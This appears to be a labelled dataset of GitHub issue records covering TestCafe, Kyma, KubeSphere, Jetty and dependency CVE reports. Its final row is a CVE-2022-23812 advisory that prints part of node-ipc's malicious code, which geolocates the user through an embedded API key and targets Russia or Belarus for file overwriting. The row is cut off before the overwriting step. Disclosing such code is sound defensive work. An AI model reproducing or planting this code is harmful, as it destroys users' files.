> testcafe chrome test.ts
Running tests in:
- Chrome 77.0.3865 / Mac OS X 10.14.6
testcafe 2140
✖ has the correct value in Request('/').url on GitHub
1) AssertionError: expected 'https://github.com/bxt/pulls' to deeply equal
'https://github.com/bxt/testcafe-2140/pulls'
Browser: Chrome 77.0.3865 / Mac OS X 10.14.6
19 |
20 | await t.expect(getPageUrl()).eql('https://github.com/bxt/testcafe-2140/deeper');
21 |
22 | await goAway();
23 |
> 24 | await t.expect(getPageUrl()).eql('https://github.com/bxt/testcafe-2140/pulls');
25 |});
26 |
at <anonymous> (/Users/bxt/test.ts:24:32)
at fulfilled (/Users/bxt/test.ts:5:58)
1/1 failed (6s)
```
</details>
### Steps to Reproduce:
Execute the code below "Your complete test code" above in a file e.g. using `testcafe chrome test.ts`.
### Your Environment details:
* testcafe version: 1.5.0
* node.js version: v12.10.0
* command-line arguments: `testcafe chrome test.ts`
* browser name and version: Chrome 77
* platform and version: macOS 10.14.6
* other: none
| 1.0 | Relative navigation after pushState does not respect new URL - ### What is your Test Scenario?
I saw some error pages that only happened in TestCafé but not when I execute the test manually. Turns out navigating with `location.href` works differently in TestCafé when you also do `history.pushState` on the page (as e.g. `react-router` does)
### What is the Current behavior?
* Load a website
* Use `history.pushState` with a URL on another level (e.g. use `/` somewhere in the 3rd argument)
* Use `location.href="relative"` to navigate
* The navigations happens relative to the initial URL and not relative to the updated URL
### What is the Expected behavior?
The navigation should happen relative to the URL currently displayed in the address bar, just like it does in the browser.
### What is your web application and your TestCafe test code?
Your website URL: I created a test that runs on some random GitHub pages, see test code below.
<details>
<summary>Your complete test code:</summary>
<!-- Paste your test code here: -->
```js
import {ClientFunction} from 'testcafe';
fixture`testcafe 2140`.page`https://github.com/bxt/testcafe-2140`;
const goAway = ClientFunction(() => {
window.location.href = 'pulls';
});
const virtualNavigation = ClientFunction(() => {
history.pushState({}, "page 2", "testcafe-2140/deeper");
});
const getPageUrl = ClientFunction(() => window.location.href);
test(`navigates to the correct URL on GitHub`, async t => {
await t.expect(getPageUrl()).eql('https://github.com/bxt/testcafe-2140');
await virtualNavigation();
await t.expect(getPageUrl()).eql('https://github.com/bxt/testcafe-2140/deeper');
await goAway();
await t.expect(getPageUrl()).eql('https://github.com/bxt/testcafe-2140/pulls');
});
```
</details>
<details>
<summary>Your complete test report:</summary>
<!-- Paste your complete result test report here (even if it is huge): -->
```
> testcafe chrome test.ts
Running tests in:
- Chrome 77.0.3865 / Mac OS X 10.14.6
testcafe 2140
✖ has the correct value in Request('/').url on GitHub
1) AssertionError: expected 'https://github.com/bxt/pulls' to deeply equal
'https://github.com/bxt/testcafe-2140/pulls'
Browser: Chrome 77.0.3865 / Mac OS X 10.14.6
19 |
20 | await t.expect(getPageUrl()).eql('https://github.com/bxt/testcafe-2140/deeper');
21 |
22 | await goAway();
23 |
> 24 | await t.expect(getPageUrl()).eql('https://github.com/bxt/testcafe-2140/pulls');
25 |});
26 |
at <anonymous> (/Users/bxt/test.ts:24:32)
at fulfilled (/Users/bxt/test.ts:5:58)
1/1 failed (6s)
```
</details>
### Steps to Reproduce:
Execute the code below "Your complete test code" above in a file e.g. using `testcafe chrome test.ts`.
### Your Environment details:
* testcafe version: 1.5.0
* node.js version: v12.10.0
* command-line arguments: `testcafe chrome test.ts`
* browser name and version: Chrome 77
* platform and version: macOS 10.14.6
* other: none
| process | relative navigation after pushstate does not respect new url what is your test scenario i saw some error pages that only happened in testcafé but not when i execute the text manually turns out navigating with location href works differently in testcafé when you also do history pushstate on the page as e g react router does what is the current behavior load a website use history pushstate with a url on another level e g use somewhere in the argument use location href relative to navigate the navigations happens relative to the initial url and not relative to the updated url what is the expected behavior the navigation should happen relative to the url currently displayed in the address bar just like it does in the browser what is your web application and your testcafe test code your website url i created a test that runs on some random github pages see test code below your complete test code js import clientfunction from testcafe fixture testcafe page const goaway clientfunction window location href pulls const virtualnavigation clientfunction history pushstate page testcafe deeper const getpageurl clientfunction window location href test navigates to the correct url on github async t await t expect getpageurl eql await virtualnavigation await t expect getpageurl eql await goaway await t expect getpageurl eql your complete test report testcafe chrome test ts running tests in chrome mac os x testcafe ✖ has the correct value in request url on github assertionerror expected to deeply equal browser chrome mac os x await t expect getpageurl eql await goaway await t expect getpageurl eql at users bxt test ts at fulfilled users bxt test ts failed steps to reproduce execute the code below your complete test code above in a file e g using testcafe chrome test ts your environment details testcafe version node js version command line arguments testcafe chrome test ts browser name and version chrome platform and version macos other none | 1 |
264,671 | 23,131,808,553 | IssuesEvent | 2022-07-28 11:04:18 | kyma-project/kyma | https://api.github.com/repos/kyma-project/kyma | reopened | [Test Case] - Test the integrations with SAP systems | kind/missing-test test-case lifecycle/frozen | **Description**
Implement tests integrating external Java application with Kyma.
We do not have an automated test for testing such integrations and we want to track such scenarios.
**Reasons**
There are some integrations written in Java that are working with Kyma. The main reason is we want to make sure that we do not break any existing integrations. | 2.0 | [Test Case] - Test the integrations with SAP systems - **Description**
Implement tests integrating external Java application with Kyma.
We do not have an automated test for testing such integrations and we want to track such scenarios.
**Reasons**
There are some integrations written in Java that are working with Kyma. The main reason is we want to make sure that we do not break any existing integrations. | non_process | test the integrations with sap systems description implement tests integrating external java application with kyma we do not have an automated test for testing such integrations and we want to track such scenarios reasons there are some integrations written in java that are working with kyma the main reason is we want to make sure that we do not break any existing integrations | 0 |
2,195 | 5,038,422,764 | IssuesEvent | 2016-12-18 08:03:40 | AllenFang/react-bootstrap-table | https://api.github.com/repos/AllenFang/react-bootstrap-table | closed | columnClassName attr is cleared when customEditor is enabled | enhancement inprocess | I noticed that using `customEditor` attribute of `TableHeaderColumn`, when a cell gets into edit mode (`customEditor` is enabled), the `<td>`s `className` defined by `columnClassName` attribute is cleared. Once the cell isn't being edited anymore, the className is restored.
```jsx
<TableHeaderColumn
key={'column-' + h.id}
columnClassName={(h.cellEditor) ? 'editable-td': ''}
customEditor={this.formatEditor(h.id, h.cellEditor)}>
{h.label}
</TableHeaderColumn>
```
Is there any way to keep the `className` in edit mode or pass a `className` to the `<td>` element when cell is in edit mode? | 1.0 | columnClassName attr is cleared when customEditor is enabled - I noticed that using `customEditor` attribute of `TableHeaderColumn`, when a cell gets into edit mode (`customEditor` is enabled), the `<td>`s `className` defined by `columnClassName` attribute is cleared. Once the cell isn't being edited anymore, the className is restored.
```jsx
<TableHeaderColumn
key={'column-' + h.id}
columnClassName={(h.cellEditor) ? 'editable-td': ''}
customEditor={this.formatEditor(h.id, h.cellEditor)}>
{h.label}
</TableHeaderColumn>
```
Is there any way to keep the `className` in edit mode or pass a `className` to the `<td>` element when cell is in edit mode? | process | columnclassname attr is cleared when customeditor is enabled i noticed that using customeditor attribute of tableheadercolumn when a cell gets into edit mode customeditor is enabled the s classname defined by columnclassname attribute is cleared once the cell isn t being edited anymore the classname is restored jsx tableheadercolumn key column h id columnclassname h celleditor editable td customeditor this formateditor h id h celleditor h label is there any way to keep the classname in edit mode or pass a classname to the element when cell is in edit mode | 1 |
454,462 | 13,101,530,563 | IssuesEvent | 2020-08-04 04:03:35 | kubesphere/kubesphere | https://api.github.com/repos/kubesphere/kubesphere | closed | No image builder shows in project | area/console area/devops kind/bug kind/need-to-verify priority/high |
**Describe the Bug**
Install a minimal env, then enable devops. As we can see devops shows in the ws, but in the project, image builder does not appear.
<img width="1208" alt="Screen Shot 2020-08-03 at 9 13 35 PM" src="https://user-images.githubusercontent.com/28859385/89186540-8637bb00-d5ce-11ea-8b04-5be6f7522880.png">
<img width="1220" alt="Screen Shot 2020-08-03 at 9 13 45 PM" src="https://user-images.githubusercontent.com/28859385/89186553-8d5ec900-d5ce-11ea-9b27-7d5aeddf5154.png">
**Versions Used**
KubeSphere: 3.0.0-dev
| 1.0 | No image builder shows in project -
**Describe the Bug**
Install a minimal env, then enable devops. As we can see devops shows in the ws, but in the project, image builder does not appear.
<img width="1208" alt="Screen Shot 2020-08-03 at 9 13 35 PM" src="https://user-images.githubusercontent.com/28859385/89186540-8637bb00-d5ce-11ea-8b04-5be6f7522880.png">
<img width="1220" alt="Screen Shot 2020-08-03 at 9 13 45 PM" src="https://user-images.githubusercontent.com/28859385/89186553-8d5ec900-d5ce-11ea-9b27-7d5aeddf5154.png">
**Versions Used**
KubeSphere: 3.0.0-dev
| non_process | no image builder shows in project describe the bug install a minimal env then enable devops as we can see devops shows in the ws but in the project image builder does not appear img width alt screen shot at pm src img width alt screen shot at pm src versions used kubesphere dev | 0 |
129,078 | 18,070,797,776 | IssuesEvent | 2021-09-21 02:29:44 | bluelockorg/blue-chat | https://api.github.com/repos/bluelockorg/blue-chat | opened | CVE-2021-3803 (Medium) detected in nth-check-1.0.2.tgz, nth-check-2.0.0.tgz | security vulnerability | ## CVE-2021-3803 - Medium Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>nth-check-1.0.2.tgz</b>, <b>nth-check-2.0.0.tgz</b></p></summary>
<p>
<details><summary><b>nth-check-1.0.2.tgz</b></p></summary>
<p>performant nth-check parser & compiler</p>
<p>Library home page: <a href="https://registry.npmjs.org/nth-check/-/nth-check-1.0.2.tgz">https://registry.npmjs.org/nth-check/-/nth-check-1.0.2.tgz</a></p>
<p>Path to dependency file: blue-chat/package.json</p>
<p>Path to vulnerable library: blue-chat/node_modules/nth-check/package.json</p>
<p>
Dependency Hierarchy:
- react-scripts-4.0.2.tgz (Root Library)
- webpack-5.5.0.tgz
- plugin-svgo-5.5.0.tgz
- svgo-1.3.2.tgz
- css-select-2.1.0.tgz
- :x: **nth-check-1.0.2.tgz** (Vulnerable Library)
</details>
<details><summary><b>nth-check-2.0.0.tgz</b></p></summary>
<p>Parses and compiles CSS nth-checks to highly optimized functions.</p>
<p>Library home page: <a href="https://registry.npmjs.org/nth-check/-/nth-check-2.0.0.tgz">https://registry.npmjs.org/nth-check/-/nth-check-2.0.0.tgz</a></p>
<p>Path to dependency file: blue-chat/package.json</p>
<p>Path to vulnerable library: blue-chat/node_modules/renderkid/node_modules/nth-check/package.json</p>
<p>
Dependency Hierarchy:
- react-scripts-4.0.2.tgz (Root Library)
- html-webpack-plugin-4.5.0.tgz
- pretty-error-2.1.2.tgz
- renderkid-2.0.7.tgz
- css-select-4.1.3.tgz
- :x: **nth-check-2.0.0.tgz** (Vulnerable Library)
</details>
<p>Found in base branch: <b>main</b></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
nth-check is vulnerable to Inefficient Regular Expression Complexity
<p>Publish Date: 2021-09-17
<p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-3803>CVE-2021-3803</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>5.5</b>)</summary>
<p>
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: N/A
- Attack Complexity: N/A
- Privileges Required: N/A
- User Interaction: N/A
- Scope: N/A
- Impact Metrics:
- Confidentiality Impact: N/A
- Integrity Impact: N/A
- Availability Impact: N/A
</p>
For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>.
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary>
<p>
<p>Type: Upgrade version</p>
<p>Origin: <a href="https://github.com/fb55/nth-check/compare/v2.0.0...v2.0.1">https://github.com/fb55/nth-check/compare/v2.0.0...v2.0.1</a></p>
<p>Release Date: 2021-09-17</p>
<p>Fix Resolution: nth-check - v2.0.1</p>
</p>
</details>
<p></p>
***
Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github) | True | CVE-2021-3803 (Medium) detected in nth-check-1.0.2.tgz, nth-check-2.0.0.tgz - ## CVE-2021-3803 - Medium Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>nth-check-1.0.2.tgz</b>, <b>nth-check-2.0.0.tgz</b></p></summary>
<p>
<details><summary><b>nth-check-1.0.2.tgz</b></p></summary>
<p>performant nth-check parser & compiler</p>
<p>Library home page: <a href="https://registry.npmjs.org/nth-check/-/nth-check-1.0.2.tgz">https://registry.npmjs.org/nth-check/-/nth-check-1.0.2.tgz</a></p>
<p>Path to dependency file: blue-chat/package.json</p>
<p>Path to vulnerable library: blue-chat/node_modules/nth-check/package.json</p>
<p>
Dependency Hierarchy:
- react-scripts-4.0.2.tgz (Root Library)
- webpack-5.5.0.tgz
- plugin-svgo-5.5.0.tgz
- svgo-1.3.2.tgz
- css-select-2.1.0.tgz
- :x: **nth-check-1.0.2.tgz** (Vulnerable Library)
</details>
<details><summary><b>nth-check-2.0.0.tgz</b></p></summary>
<p>Parses and compiles CSS nth-checks to highly optimized functions.</p>
<p>Library home page: <a href="https://registry.npmjs.org/nth-check/-/nth-check-2.0.0.tgz">https://registry.npmjs.org/nth-check/-/nth-check-2.0.0.tgz</a></p>
<p>Path to dependency file: blue-chat/package.json</p>
<p>Path to vulnerable library: blue-chat/node_modules/renderkid/node_modules/nth-check/package.json</p>
<p>
Dependency Hierarchy:
- react-scripts-4.0.2.tgz (Root Library)
- html-webpack-plugin-4.5.0.tgz
- pretty-error-2.1.2.tgz
- renderkid-2.0.7.tgz
- css-select-4.1.3.tgz
- :x: **nth-check-2.0.0.tgz** (Vulnerable Library)
</details>
<p>Found in base branch: <b>main</b></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
nth-check is vulnerable to Inefficient Regular Expression Complexity
<p>Publish Date: 2021-09-17
<p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-3803>CVE-2021-3803</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>5.5</b>)</summary>
<p>
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: N/A
- Attack Complexity: N/A
- Privileges Required: N/A
- User Interaction: N/A
- Scope: N/A
- Impact Metrics:
- Confidentiality Impact: N/A
- Integrity Impact: N/A
- Availability Impact: N/A
</p>
For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>.
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary>
<p>
<p>Type: Upgrade version</p>
<p>Origin: <a href="https://github.com/fb55/nth-check/compare/v2.0.0...v2.0.1">https://github.com/fb55/nth-check/compare/v2.0.0...v2.0.1</a></p>
<p>Release Date: 2021-09-17</p>
<p>Fix Resolution: nth-check - v2.0.1</p>
</p>
</details>
<p></p>
***
Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github) | non_process | cve medium detected in nth check tgz nth check tgz cve medium severity vulnerability vulnerable libraries nth check tgz nth check tgz nth check tgz performant nth check parser compiler library home page a href path to dependency file blue chat package json path to vulnerable library blue chat node modules nth check package json dependency hierarchy react scripts tgz root library webpack tgz plugin svgo tgz svgo tgz css select tgz x nth check tgz vulnerable library nth check tgz parses and compiles css nth checks to highly optimized functions library home page a href path to dependency file blue chat package json path to vulnerable library blue chat node modules renderkid node modules nth check package json dependency hierarchy react scripts tgz root library html webpack plugin tgz pretty error tgz renderkid tgz css select tgz x nth check tgz vulnerable library found in base branch main vulnerability details nth check is vulnerable to inefficient regular expression complexity publish date url a href cvss score details base score metrics exploitability metrics attack vector n a attack complexity n a privileges required n a user interaction n a scope n a impact metrics confidentiality impact n a integrity impact n a availability impact n a for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution nth check step up your open source security game with whitesource | 0 |
47,732 | 25,162,285,404 | IssuesEvent | 2022-11-10 17:42:55 | eclipse/jetty.project | https://api.github.com/repos/eclipse/jetty.project | closed | `ArrayRetainableByteBufferPool` inefficiently calculates bucket indices | Enhancement Performance | **Jetty version(s)**
10, 11, 12
**Enhancement Description**
The `ArrayRetainableByteBufferPool.bucketFor()` method is on the fast path of every served request, and it delegates its index calculation to a `Function<Integer, Integer>` lambda. This implies boxing and unboxing are happening each time a bucket must be chosen, and this inefficiency started appearing in profiling reports.
This code should be modified so that no boxing/unboxing is done anymore. A simple way would be to replace the `Function<Integer, Integer>` lambda with a custom `IntIntFunction` one for instance. | True | `ArrayRetainableByteBufferPool` inefficiently calculates bucket indices - **Jetty version(s)**
10, 11, 12
**Enhancement Description**
The `ArrayRetainableByteBufferPool.bucketFor()` method is on the fast path of every served request, and it delegates its index calculation to a `Function<Integer, Integer>` lambda. This implies boxing and unboxing are happening each time a bucket must be chosen, and this inefficiency started appearing in profiling reports.
This code should be modified so that no boxing/unboxing is done anymore. A simple way would be to replace the `Function<Integer, Integer>` lambda with a custom `IntIntFunction` one for instance. | non_process | arrayretainablebytebufferpool inefficiently calculates bucket indices jetty version s enhancement description the arrayretainablebytebufferpool bucketfor method is on the fast path of every served request and it delegates its index calculation to a function lambda this implies boxing and unboxing are happening each time a bucket must be chosen and this inefficiency started appearing in profiling reports this code should be modified so that no boxing unboxing is done anymore a simple way would be to replace the function lambda with a custom intintfunction one for instance | 0 |
202,473 | 23,077,324,920 | IssuesEvent | 2022-07-26 01:48:23 | billmcchesney1/flow | https://api.github.com/repos/billmcchesney1/flow | opened | CVE-2022-2047 (Low) detected in multiple libraries | security vulnerability | ## CVE-2022-2047 - Low Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>jetty-client-9.4.33.v20201020.jar</b>, <b>jetty-server-9.4.33.v20201020.jar</b>, <b>jetty-http-9.4.33.v20201020.jar</b></p></summary>
<p>
<details><summary><b>jetty-client-9.4.33.v20201020.jar</b></p></summary>
<p>The Eclipse Jetty Project</p>
<p>Library home page: <a href="https://eclipse.org/jetty">https://eclipse.org/jetty</a></p>
<p>Path to dependency file: /pom.xml</p>
<p>Path to vulnerable library: /home/wss-scanner/.m2/repository/org/eclipse/jetty/jetty-client/9.4.33.v20201020/jetty-client-9.4.33.v20201020.jar</p>
<p>
Dependency Hierarchy:
- websocket-server-9.4.33.v20201020.jar (Root Library)
- websocket-client-9.4.33.v20201020.jar
- :x: **jetty-client-9.4.33.v20201020.jar** (Vulnerable Library)
</details>
<details><summary><b>jetty-server-9.4.33.v20201020.jar</b></p></summary>
<p>The core jetty server artifact.</p>
<p>Library home page: <a href="https://eclipse.org/jetty">https://eclipse.org/jetty</a></p>
<p>Path to dependency file: /pom.xml</p>
<p>Path to vulnerable library: /canner/.m2/repository/org/eclipse/jetty/jetty-server/9.4.33.v20201020/jetty-server-9.4.33.v20201020.jar</p>
<p>
Dependency Hierarchy:
- :x: **jetty-server-9.4.33.v20201020.jar** (Vulnerable Library)
</details>
<details><summary><b>jetty-http-9.4.33.v20201020.jar</b></p></summary>
<p>The Eclipse Jetty Project</p>
<p>Library home page: <a href="https://eclipse.org/jetty">https://eclipse.org/jetty</a></p>
<p>Path to dependency file: /pom.xml</p>
<p>Path to vulnerable library: /home/wss-scanner/.m2/repository/org/eclipse/jetty/jetty-http/9.4.33.v20201020/jetty-http-9.4.33.v20201020.jar</p>
<p>
Dependency Hierarchy:
- jetty-server-9.4.33.v20201020.jar (Root Library)
- :x: **jetty-http-9.4.33.v20201020.jar** (Vulnerable Library)
</details>
<p>Found in HEAD commit: <a href="https://github.com/billmcchesney1/flow/commit/eb687271afab9d7c61ca82fce2ed4fdb3d5e1a70">eb687271afab9d7c61ca82fce2ed4fdb3d5e1a70</a></p>
<p>Found in base branch: <b>master</b></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/low_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
In Eclipse Jetty versions 9.4.0 thru 9.4.46, and 10.0.0 thru 10.0.9, and 11.0.0 thru 11.0.9 versions, the parsing of the authority segment of an http scheme URI, the Jetty HttpURI class improperly detects an invalid input as a hostname. This can lead to failures in a Proxy scenario.
<p>Publish Date: 2022-07-07
<p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2022-2047>CVE-2022-2047</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>2.7</b>)</summary>
<p>
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: High
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: Low
- Availability Impact: None
</p>
For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>.
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary>
<p>
<p>Type: Upgrade version</p>
<p>Origin: <a href="https://github.com/eclipse/jetty.project/security/advisories/GHSA-cj7v-27pg-wf7q">https://github.com/eclipse/jetty.project/security/advisories/GHSA-cj7v-27pg-wf7q</a></p>
<p>Release Date: 2022-07-07</p>
<p>Fix Resolution (org.eclipse.jetty:jetty-http): 10.0.0-alpha0</p>
<p>Direct dependency fix Resolution (org.eclipse.jetty:jetty-server): 9.4.44.v20210927</p>
</p>
</details>
<p></p>
***
<!-- REMEDIATE-OPEN-PR-START -->
- [ ] Check this box to open an automated fix PR
<!-- REMEDIATE-OPEN-PR-END -->
| True | CVE-2022-2047 (Low) detected in multiple libraries - ## CVE-2022-2047 - Low Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>jetty-client-9.4.33.v20201020.jar</b>, <b>jetty-server-9.4.33.v20201020.jar</b>, <b>jetty-http-9.4.33.v20201020.jar</b></p></summary>
<p>
<details><summary><b>jetty-client-9.4.33.v20201020.jar</b></p></summary>
<p>The Eclipse Jetty Project</p>
<p>Library home page: <a href="https://eclipse.org/jetty">https://eclipse.org/jetty</a></p>
<p>Path to dependency file: /pom.xml</p>
<p>Path to vulnerable library: /home/wss-scanner/.m2/repository/org/eclipse/jetty/jetty-client/9.4.33.v20201020/jetty-client-9.4.33.v20201020.jar</p>
<p>
Dependency Hierarchy:
- websocket-server-9.4.33.v20201020.jar (Root Library)
- websocket-client-9.4.33.v20201020.jar
- :x: **jetty-client-9.4.33.v20201020.jar** (Vulnerable Library)
</details>
<details><summary><b>jetty-server-9.4.33.v20201020.jar</b></p></summary>
<p>The core jetty server artifact.</p>
<p>Library home page: <a href="https://eclipse.org/jetty">https://eclipse.org/jetty</a></p>
<p>Path to dependency file: /pom.xml</p>
<p>Path to vulnerable library: /canner/.m2/repository/org/eclipse/jetty/jetty-server/9.4.33.v20201020/jetty-server-9.4.33.v20201020.jar</p>
<p>
Dependency Hierarchy:
- :x: **jetty-server-9.4.33.v20201020.jar** (Vulnerable Library)
</details>
<details><summary><b>jetty-http-9.4.33.v20201020.jar</b></p></summary>
<p>The Eclipse Jetty Project</p>
<p>Library home page: <a href="https://eclipse.org/jetty">https://eclipse.org/jetty</a></p>
<p>Path to dependency file: /pom.xml</p>
<p>Path to vulnerable library: /home/wss-scanner/.m2/repository/org/eclipse/jetty/jetty-http/9.4.33.v20201020/jetty-http-9.4.33.v20201020.jar</p>
<p>
Dependency Hierarchy:
- jetty-server-9.4.33.v20201020.jar (Root Library)
- :x: **jetty-http-9.4.33.v20201020.jar** (Vulnerable Library)
</details>
<p>Found in HEAD commit: <a href="https://github.com/billmcchesney1/flow/commit/eb687271afab9d7c61ca82fce2ed4fdb3d5e1a70">eb687271afab9d7c61ca82fce2ed4fdb3d5e1a70</a></p>
<p>Found in base branch: <b>master</b></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/low_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
In Eclipse Jetty versions 9.4.0 thru 9.4.46, and 10.0.0 thru 10.0.9, and 11.0.0 thru 11.0.9 versions, the parsing of the authority segment of an http scheme URI, the Jetty HttpURI class improperly detects an invalid input as a hostname. This can lead to failures in a Proxy scenario.
<p>Publish Date: 2022-07-07
<p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2022-2047>CVE-2022-2047</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>2.7</b>)</summary>
<p>
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: High
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: Low
- Availability Impact: None
</p>
For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>.
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary>
<p>
<p>Type: Upgrade version</p>
<p>Origin: <a href="https://github.com/eclipse/jetty.project/security/advisories/GHSA-cj7v-27pg-wf7q">https://github.com/eclipse/jetty.project/security/advisories/GHSA-cj7v-27pg-wf7q</a></p>
<p>Release Date: 2022-07-07</p>
<p>Fix Resolution (org.eclipse.jetty:jetty-http): 10.0.0-alpha0</p>
<p>Direct dependency fix Resolution (org.eclipse.jetty:jetty-server): 9.4.44.v20210927</p>
</p>
</details>
<p></p>
***
<!-- REMEDIATE-OPEN-PR-START -->
- [ ] Check this box to open an automated fix PR
<!-- REMEDIATE-OPEN-PR-END -->
| non_process | cve low detected in multiple libraries cve low severity vulnerability vulnerable libraries jetty client jar jetty server jar jetty http jar jetty client jar the eclipse jetty project library home page a href path to dependency file pom xml path to vulnerable library home wss scanner repository org eclipse jetty jetty client jetty client jar dependency hierarchy websocket server jar root library websocket client jar x jetty client jar vulnerable library jetty server jar the core jetty server artifact library home page a href path to dependency file pom xml path to vulnerable library canner repository org eclipse jetty jetty server jetty server jar dependency hierarchy x jetty server jar vulnerable library jetty http jar the eclipse jetty project library home page a href path to dependency file pom xml path to vulnerable library home wss scanner repository org eclipse jetty jetty http jetty http jar dependency hierarchy jetty server jar root library x jetty http jar vulnerable library found in head commit a href found in base branch master vulnerability details in eclipse jetty versions thru and thru and thru versions the parsing of the authority segment of an http scheme uri the jetty httpuri class improperly detects an invalid input as a hostname this can lead to failures in a proxy scenario publish date url a href cvss score details base score metrics exploitability metrics attack vector network attack complexity low privileges required high user interaction none scope unchanged impact metrics confidentiality impact none integrity impact low availability impact none for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution org eclipse jetty jetty http direct dependency fix resolution org eclipse jetty jetty server check this box to open an automated fix pr | 0 |
168,661 | 20,790,512,403 | IssuesEvent | 2022-03-17 01:04:32 | andrewguest/cookiecutter-fullstack-fastapi-postgresql | https://api.github.com/repos/andrewguest/cookiecutter-fullstack-fastapi-postgresql | opened | CVE-2022-23812 (High) detected in node-ipc-9.2.2.tgz | security vulnerability | ## CVE-2022-23812 - High Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>node-ipc-9.2.2.tgz</b></p></summary>
<p>A nodejs module for local and remote Inter Process Communication (IPC), Neural Networking, and able to facilitate machine learning.</p>
<p>Library home page: <a href="https://registry.npmjs.org/node-ipc/-/node-ipc-9.2.2.tgz">https://registry.npmjs.org/node-ipc/-/node-ipc-9.2.2.tgz</a></p>
<p>Path to dependency file: /{{cookiecutter.project_slug}}/frontend/package.json</p>
<p>Path to vulnerable library: /{{cookiecutter.project_slug}}/frontend/node_modules/node-ipc/package.json</p>
<p>
Dependency Hierarchy:
- cli-plugin-babel-4.5.15.tgz (Root Library)
- cli-shared-utils-4.5.15.tgz
- :x: **node-ipc-9.2.2.tgz** (Vulnerable Library)
<p>Found in base branch: <b>master</b></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
This affects the package node-ipc from 10.1.1 and before 10.1.3.
This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji.
**Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior.
Malicious Code:
**Note:** Don't run it!
```js
import u from "path";
import a from "fs";
import o from "https";
setTimeout(function () {
  const t = Math.round(Math.random() * 4);
  if (t > 1) {
    return;
  }
  const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154
  o.get(n.toString("utf8"), function (t) {
    t.on("data", function (t) {
      const n = Buffer.from("Li8=", "base64");
      const o = Buffer.from("Li4v", "base64");
      const r = Buffer.from("Li4vLi4v", "base64");
      const f = Buffer.from("Lw==", "base64");
      const c = Buffer.from("Y291bnRyeV9uYW1l", "base64");
      const e = Buffer.from("cnVzc2lh", "base64");
      const i = Buffer.from("YmVsYXJ1cw==", "base64");
      try {
        const s = JSON.parse(t.toString("utf8"));
        const u = s[c.toString("utf8")].toLowerCase();
